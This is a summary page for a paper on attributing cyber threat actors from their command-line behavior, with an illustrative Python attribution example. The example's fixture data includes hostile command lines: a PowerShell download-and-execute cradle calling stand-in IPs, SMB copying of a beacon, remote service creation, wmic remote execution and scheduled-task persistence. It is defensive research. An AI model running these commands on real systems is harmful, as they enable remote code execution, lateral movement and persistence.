Halit Alptekin

Unveiling Cyber Threat Actors

A hybrid deep learning approach combining Transformers and CNNs for attributing cyber threat actors based on command line behaviors.

Published: ARES 2024
Keywords: #cnn #cobalt-strike #cti #ioc #nlp #transformers #ttp
We present a method for identifying cyber threat actors from their behavior, specifically the command sequences they run during an attack. We built a dataset of commands from many actors, with a heavy focus on the #cobalt-strike framework.

Key Contributions

  • Hybrid Architecture: We combine #transformers (for global context) and Convolutional Neural Networks (#CNN, for local features) to profile threat actors.
  • Behavioral Attribution: We move beyond simple #IoC matching to "soft attribution" based on behavioral signatures (#TTP).
  • Performance: Our model reached an F1-score of 95.11% and accuracy of 95.13% on a high-count dataset, beating pre-trained models like BERT, RoBERTa, SecureBERT, and DarkBERT.

Methodology

  • Dataset: We collected command sequences from real-world incidents and #CTI reports.
  • Preprocessing: We used Natural Language Processing (#NLP) to tokenize and process the command lines.
  • Model: A hybrid deep learning model integrating:
    • Transformers: To capture long-range dependencies and global context in the sequence of commands.
    • CNNs: To extract local features and patterns within specific commands or short sequences.
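The preprocessing step and the "behavioral rather than indicator-based" idea from the contributions above can be made concrete with a small worked example. The code below is an added illustration written for this page; it is not the paper's code, and the tokenizer rules, placeholder names, the two actor labels and all command lines are constructed assumptions, not data from the paper's dataset or from any real incident. It masks indicator-like fragments (IPs, URLs, local and UNC paths, hashes, encoded blobs, numbers) before tokenizing, builds an n-gram profile per actor, and attributes an unseen command sequence by cosine similarity. The deep model in the paper replaces this n-gram similarity; the point shown here is what the tokens look like once indicators are masked, and why the same behavior then matches across different infrastructure.

```python
import re
from collections import Counter
from math import sqrt

# Placeholder substitutions applied before tokenizing. Each replaces an
# indicator-like fragment with a fixed placeholder so two intrusions that run
# the same commands against different infrastructure yield the same tokens.
# Order matters: the UNC rule expects IPs to have been replaced already.
# These patterns are this example's own assumptions, not the paper's rules.
IOC_PATTERNS = [
    (re.compile(r"(?i)(-enc(?:odedcommand)?\s+)\S+"), r"\1<B64>"),
    (re.compile(r"https?://[^\s'\")]+"), "<URL>"),
    (re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?\b"), "<IP>"),
    (re.compile(r"\\\\(?:<IP>|[\w.-]+)(?:\\[\w\\.$-]+)?"), "<UNC>"),
    (re.compile(r"[A-Za-z]:\\[\w\\.$-]+"), "<PATH>"),
    (re.compile(r"\b[a-fA-F0-9]{32,64}\b"), "<HASH>"),
    (re.compile(r"\b\d+\b"), "<NUM>"),
]

# Token grammar: placeholders, words (including dotted or hyphenated names such
# as cmd.exe or New-Object), numbers, /switches, -flags, single punctuation.
TOKEN_RE = re.compile(
    r"<[A-Z0-9]+>|[A-Za-z_$][\w.$-]*|\d[\w.]*|/[A-Za-z]+|-{1,2}[A-Za-z][\w-]*|[^\w\s]"
)


def normalize(cmd):
    """Replace indicator fragments in one command line with placeholders."""
    for pattern, placeholder in IOC_PATTERNS:
        cmd = pattern.sub(placeholder, cmd)
    return cmd


def tokenize(cmd):
    """Normalize, then split into lower-cased tokens (placeholders keep case)."""
    return [t if t.startswith("<") else t.lower() for t in TOKEN_RE.findall(normalize(cmd))]


def sequence_tokens(commands):
    """Tokens of a whole intrusion, with a <SEP> marker between commands so
    bigrams also capture which command followed which."""
    toks = []
    for cmd in commands:
        if toks:
            toks.append("<SEP>")
        toks.extend(tokenize(cmd))
    return toks


def ngrams(tokens, n_max=2):
    """Counts of token unigrams and bigrams for one sequence."""
    grams = Counter()
    for n in range(1, n_max + 1):
        for i in range(len(tokens) - n + 1):
            grams[tuple(tokens[i:i + n])] += 1
    return grams


def cosine(a, b):
    dot = sum(a[k] * b[k] for k in a if k in b)
    na = sqrt(sum(v * v for v in a.values()))
    nb = sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0


def build_profiles(labelled):
    """One n-gram profile per actor from their labelled command sequences."""
    return {actor: ngrams(sequence_tokens(cmds)) for actor, cmds in labelled.items()}


def attribute(commands, profiles):
    """Return (best actor, {actor: similarity}) for an unseen sequence."""
    vec = ngrams(sequence_tokens(commands))
    scores = {actor: cosine(vec, prof) for actor, prof in profiles.items()}
    return max(scores, key=scores.get), scores


# Constructed training data: two fictional actors with different habits.
TRAINING = {
    "actor-A": [  # net/nltest discovery, then SMB copy and remote service
        r"whoami /groups",
        r'net group "domain admins" /domain',
        r"nltest /dclist:corp.local",
        r"copy beacon.exe \\10.0.0.5\C$\Windows\Temp\svc.exe",
        r"sc \\10.0.0.5 create svc binpath= C:\Windows\Temp\svc.exe",
        r"sc \\10.0.0.5 start svc",
    ],
    "actor-B": [  # PowerShell download cradle, WMI, rundll32, scheduled task
        r"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')",
        r"wmic /node:203.0.113.9 process call create cmd.exe /c whoami",
        r"powershell -enc aGVsbG8=",
        r"rundll32.exe C:\Users\Public\upd.dll,DllMain",
        r"schtasks /create /tn Updater /tr C:\Users\Public\upd.dll /sc minute /mo 5",
    ],
}

# Constructed unseen sequences: same behaviour, different hosts, names, URLs.
UNSEEN = {
    "smb-lateral-movement": [
        r"whoami /groups",
        r'net group "enterprise admins" /domain',
        r"copy x.exe \\192.168.1.20\C$\Windows\Temp\x.exe",
        r"sc \\192.168.1.20 create x binpath= C:\Windows\Temp\x.exe",
        r"sc \\192.168.1.20 start x",
    ],
    "powershell-download-cradle": [
        r"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.4/b.ps1')",
        r"wmic /node:198.51.100.6 process call create cmd.exe /c hostname",
        r"schtasks /create /tn Sync /tr C:\Users\Public\s.dll /sc minute /mo 10",
    ],
}

if __name__ == "__main__":
    profiles = build_profiles(TRAINING)
    for name, seq in UNSEEN.items():
        best, scores = attribute(seq, profiles)
        print(f"{name}: {best} {({k: round(v, 3) for k, v in scores.items()})}")
```

Because every IP, path and URL collapses to a placeholder, `sc \\10.0.0.5 start svc` and `sc \\192.168.1.20 start x` begin with the same two tokens, and the unseen SMB sequence scores highest against actor-A even though none of its indicators appear in the training data. A plain IoC match would return nothing here; that gap is what the "soft attribution" in the paper is about. Masking is also where a practitioner should expect to tune: mask too little and the model memorizes infrastructure, mask too much (for example collapsing `C:\Windows\Temp` into the same placeholder as `C:\Users\Public`) and it loses a genuine TTP detail.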

Significance

This pushes automated threat attribution forward. It can cut the workload for incident responders by suggesting a likely threat actor from observed behavior rather than from static indicators alone, which an actor can swap between intrusions.